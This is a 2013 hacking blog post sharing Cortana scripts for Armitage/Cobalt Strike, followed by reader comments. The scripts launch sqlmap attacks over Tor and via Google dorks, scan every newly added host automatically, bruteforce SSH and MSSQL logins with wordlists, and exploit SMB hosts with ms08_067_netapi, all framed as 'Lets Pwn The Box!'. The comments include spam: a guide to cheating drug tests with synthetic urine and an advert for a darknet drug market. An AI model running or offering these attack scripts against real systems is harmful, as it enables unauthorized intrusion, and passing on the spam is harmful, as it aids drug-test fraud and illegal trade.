Comments

Friday, December 6, 2013

One Day with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Friday, December 06, 2013 Read our previous post

Beacon A new advance payload for Cobalt Strike

Today i work a little bit with Cobalt Strike 21 Days Demo.

Really Great Pentest tool like Armitage http://www.advancedpentest.com/ 

After some time i found the Script menu into Cobalt Stike,letz google it what we can do with the Script Engine.

After a while a found a great pdf doko about the Contana Script Engine. Download the pdf here cortana_tutorial.pdf

Now letz play with it.

 

Contana Script Engine Lesson 1
Custom Armitage Menu via Cortana scripts
# Contana-Info Sites Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Info Sites" {
item "Security is just an Illusion" {
url_open("http://security-is-just-an-illusion.blogspot.de/"
);
}
item "TheHackerNews" {
url_open("http://thehackernews.com/");
}
item "Securitytube" {
url_open("http://www.securitytube.net");
}
item "Shodanhq" {
url_open("http://www.shodanhq.com/");
}
item "Exploit-db" {
url_open("http://www.exploit-db.com/");
}
item "1337day" {
url_open("http://1337day.com/");
}
item "Privatepaste" {
url_open("http://privatepaste.com/");
}
item "Hash-cracker.com" {
url_open("http://www.hash-cracker.com/");
}
item "Rainbowtables.it64.com" {
url_open("http://rainbowtables.it64.com/");
}
item "X-attack.net" {
url_open("https://www.x-attack.net/?rtcrack");
}
}
}

Kali-2013-11-26-18-36-52


Contana Script Engine Lesson 2

Custom Armitage Tor Network Menu via Cortana scripts

# Contana-Tor Network Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de


menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Tor Engine" {
item "Start Tor" {
println("\n----------------------------------------\n\c4Starting\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Start Tor NetWork");
cmd($console, "tor");
#sleep(30 * 1000);
db_sync()
}
item "Kill Tor" {
println("\n----------------------------------------\n\c4Stop\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Kill Tor NetWork");
cmd($console, "killall tor");
#sleep(30 * 1000);
db_sync()
}
item "Restart Tor" {
println("\n----------------------------------------\n\c4Restart\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Restart Tor NetWork");
cmd($console, "killall tor && tor");
#sleep(30 * 1000);
db_sync()
}
}
}

Kali-2013-11-26-18-35-57


Contana Script Engine Lesson 2

Custom Armitage Sqlmap Interface Menu via Cortana scripts

# Contana-Sqlmap Interface Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de
# Change Gnome Profile to avoid terminal close after exploit

println("\n----------------------------------------\n\c4[*] Contana-Sqlmap Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Sqlmap" {
item "Attack" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent -u $ip ;bash");
db_sync()
}
}
item "Attack over Tor" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -u $ip ;bash");
db_sync()
}
}
item "Attack with GDork" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with google Dorks\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent -g $ip ;bash");
db_sync()
}
}
item "Attack with GDork over Tor" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with Google Dorks over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -g $ip ;bash");
db_sync()
}
}
item "GDorks List" {
url_open("http://pastebin.com/raw.php?i=QFhBYbPw");
}
}
}


Kali-2013-11-26-18-37-01


Kali-2013-11-26-18-44-16


Kali-2013-11-26-19-16-37


Contana Script Engine Lesson 3

Custom Armitage on Host add Auto TCP Port Quick Scan via Cortana scripts

# Contana-Quick-Scan Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Contana-Quick-Scan Engine v0.1 Loaded [*] \n----------------------------------------");

# Preform auto scan
on host_add {
sleep(10 * 1000);
println("\n----------------------------------------\n\c4[*] Scanning New Host \nIP : \c9$1\c9\n----------------------------------------");
$console = console();
#$console = open_console_tab("Scanning New Host");
cmd($console, "use auxiliary/scanner/portscan/tcp");
cmd($console, "set THREADS 100");
cmd($console, "set PORTS 21, 22, 23, 25, 80, 110, 143, 443, 445, 1433, 3306, 4899, 5800, 5801, 8080");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
cmd($console, "set THREADS 100");
cmd($console, "set BATCHSIZE 256");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
#sleep(30 * 1000);
db_sync();
}

on service_add_21 {
println("\n----------------------------------------\n\c4[*] FTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 21 Open\n----------------------------------------");
}

on service_add_22 {
println("\n----------------------------------------\n\c4[*] SSH-SERVER FOUND \nIP : \c9$1\c9\nPort : 22 Open\n----------------------------------------");
}

on service_add_23 {
println("\n----------------------------------------\n\c4[*] TELNET-SERVER FOUND \nIP : \c9$1\c9\nPort : 23 Open\n----------------------------------------");
}

on service_add_25 {
println("\n----------------------------------------\n\c4[*] SMTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 25 Open\n----------------------------------------");
}

on service_add_80 {
println("\n----------------------------------------\n\c4[*] WEB-SERVER FOUND \nIP : \c9$1\c9\nPort : 80 Open\n----------------------------------------");
}

on service_add_110 {
println("\n----------------------------------------\n\c4[*] POP3-SERVER FOUND \nIP : \c9$1\c9\nPort : 110 Open\n----------------------------------------");
}

on service_add_143 {
println("\n----------------------------------------\n\c4[*] IMAP-SERVER FOUND \nIP : \c9$1\c9\nPort : 143 Open\n----------------------------------------");
}

on service_add_443 {
println("\n----------------------------------------\n\c4[*] HTTPS-SERVER FOUND \nIP : \c9$1\c9\nPort : 443 Open\n----------------------------------------");
}

on service_add_445 {
println("\n----------------------------------------\n\c4[*] MICROSOFT-DS-SERVER FOUND \nIP : \c9$1\c9\nPort : 445 Open\n----------------------------------------");
}

on service_add_1433 {
println("\n----------------------------------------\n\c4[*] MS-SQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 1433 Open\n----------------------------------------");
}

on service_add_3306 {
println("\n----------------------------------------\n\c4[*] MYSQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 3306 Open\n----------------------------------------");
}

on service_add_4899 {
println("\n----------------------------------------\n\c4[*] RADMIN-SERVER FOUND \nIP : \c9$1\c9\nPort : 4899 Open\n----------------------------------------");
}

on service_add_5800 {
println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5800 Open\n----------------------------------------");
}

on service_add_5801 {
println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5801 Open\n----------------------------------------");
}

on service_add_8080 {
println("\n----------------------------------------\n\c4[*] Shared-Service-SERVER FOUND \nIP : \c9$1\c9\nPort : 8080 Open\n----------------------------------------");
}
# EOF

Kali-2013-11-26-19-24-11


Contana Script Engine Lesson 4

Custom Armitage on Host add  &&  port 22  found Auto Bruteforce via Cortana scripts

# Brute New Host with SSH Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

# Preform auto msf port scan
# by monstream00

on host_add {
sleep(10 * 1000);
println("[*] msfScanning New Host TCP/UDP on $1");
$console = console();
#$console = open_console_tab("TCP/UDPscan_$1"); #Debug use
cmd($console, "use auxiliary/scanner/portscan/tcp");
cmd($console, "set THREADS 100");
cmd($console, "set PORTS 21, 22, 80, 110, 143, 443, 445, 1433, 3306, 8080");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
cmd($console, "set THREADS 100");
cmd($console, "set BATCHSIZE 256");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
#sleep(30 * 1000);
db_sync();
}


on service_add_22 {
println("\n----------------------------------------\n\c4Attempting to bruteforce\c4 SSH-Server\nIP: \c9$1\c9 \n----------------------------------------");
auxiliary("scanner/ssh/ssh_login", @($1), %(
THREADS => '100',
STOP_ON_SUCCESS => '1',
USER_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_users.txt',
PASS_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt'));
}

Kali-2013-11-26-18-41-03


Brute New Host with MSSQL Server Ready on it

# Brute New Host with MSSQL Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_1433 {
println("Attempting to brute force MSSQL-Server |$1|");
auxiliary("scanner/mssql/mssql_login", @($1), %(
USER_FILE => '/opt/framework3/msf3/data/wordlists/unix_users.txt',
PASS_FILE => '/opt/framework3/msf3/data/wordlists/unix_passwords.txt'));
}

Contana Script Engine Lesson 4

Custom Armitage on Host add Auto Exploit via Cortana scripts

# Exploit New Host with microsoft-ds samba with the ms08_067_netapi exploit.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_445 {
println("[*]Exploiting $1 with ms08_067_netapi sploit (" . host_os($1) . ")");
if (host_os($1) eq "Microsoft Windows") {
exploit("windows/smb/ms08_067_netapi", $1);
}
else {
exploit("multi/samba/usermap_script", $1, $null, $null, 1);
}
}

Now Have pfun with Contana Script Engine ;)

166 comments:

  1. Awesome, Why not upload your scripts on Cortana Github repository. It will be more usefull. :-D

    ReplyDelete
  2. Thanks Beny Green ;)
    Feel free to upload it to Github all information are open-source here.
    Dont have a git account atm.

    ReplyDelete
  3. Онлайн гадание на картах Таро на любовь позволяет просмотреть, что человека подстерегает в предстоящем времени. Попытка просмотреть приближающиеся явления всегда заманивал человечество. Каждый порывается узнать собственную судьбу и представляет конкретные типы гадания наиболее достоверными.

    ReplyDelete
  4. Различные версии гадания называются как мистические учения. Всякий тип гадания индивидуален и подготовлен для различных задач. Гадание на рунах на ситуацию и подлинность ворожбы в основном зависит от компетенции гадающего. Любой желает знать собственную судьбу и считает определенные методы ворожбы наиболее результативными.

    ReplyDelete
  5. Комплекс мероприятий, сориентированных на предсказание жизненного пути, отмечают как ворожба. Гадание на будущую жену - это простейший вариант узнать судьбу с применением различных предметов и методов. Магические силы и разного рода положения гадания деятелями науки не подтверждены, но многие люди в них верят. Природа Таро закрыто пеленой таинства, ибо подлинно ни один человек не знает, как они возникли. Стародавние карты сопровождали человечество в период зафиксированной истории. Ходят слухи, что карты Таро впервые возникли ещё в колыбели зарождения человечества - Египте.

    ReplyDelete
  6. The price is 4364, source. You'll need to place the mixture in the hand warmer and routinely check the temperature. Once you've hit the perfect spot, keep the sample closer to your body to prevent anything from overheating. Body Heat If you're planning on heating the sample with just plain body heat, make sure you have a few hours until your drug test. It takes a lot longer than the other two methods to heat up the sample to the necessary temperature when taking this route. You'll need to keep the sample near the warmest parts of your body. Men can keep it near their crotch, right below the underwear, whereas women can either do the same or store it in the space between the bra and the skin. Make sure you verify the temperature with a temperature strip before submitting the sample for a drug test. There are very specific and detailed instructions already present to create and use synthetic urine. That being said, a tip here and a trick there can do wonders for success rates, especially if it's your first time taking a drug test. Take it from the experts: below is a list of tips and tricks to be followed to a t when dealing with synthetic urine. • Don't stray from the instructions. There are tons of 'time-saving tips' and such present on the internet, but we promise none of them work. You're just risking your own career when you aren't following the instructions correctly. • Detoxing, drinking lots of water, and other such tricks will not help you in a drug test. Actually, drinking water excessively can lead to a bad sample and inconclusive results. An inconclusive result means they're bound to come back to ask for another sample. • Synthetic urine cools off even faster than regular urine. When you're hiding the sample, make sure you're letting the body heat keep it at the required temperature. While you can be pee-shy and let the sample cool down a few degrees, it isn't as easy to heat up a sample. • Even the best synthetic urine will only last you six hours. After the six hours, the sample will become invalid. • Whether it's a testing strip, belt, or vial, use the items that come with the package. Apart from paying for them, using the items that come with the product leads to a better chance at success. • Use a belt if it has come with your kit when going for your drug test – there’s no better way to get through the test, trust us on this! • Preferably get the sample ready on the day of the test. Usually, getting it ready just an hour before gets you the best results. • The heating of a sample cannot happen in sunlight. Do not place the synthetic urine in direct sunlight for this purpose. You're just destroying the sample you've painstakingly created. If you thought fooling a drug test was the only reason synthetic urine was created, we're here to show you otherwise. There's a large market for synthetic urine, and while fooling drug tests is a big part of it, there are multiple other uses.

    ReplyDelete
  7. На площадке hydraclubbioknikokex7njhwuahc2l67lfiz7z36md2jvopda7nchid сайт пользователи имеют возможность приобретать вещи отдельной единицей, либо оптовой партией. В данном случае есть возможность подобрать любые вещества, смартфоны и дорогостоящую информацию. Выбрать желаемый товар максимально несложно – разрешено сопоставить стоимость, или открыть показатели реализаторов. Профессиональные реализаторы маркетплейса ГидраUnion имеют определенный ранг, что отображен каждому клиенту маркетплейса.

    ReplyDelete

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template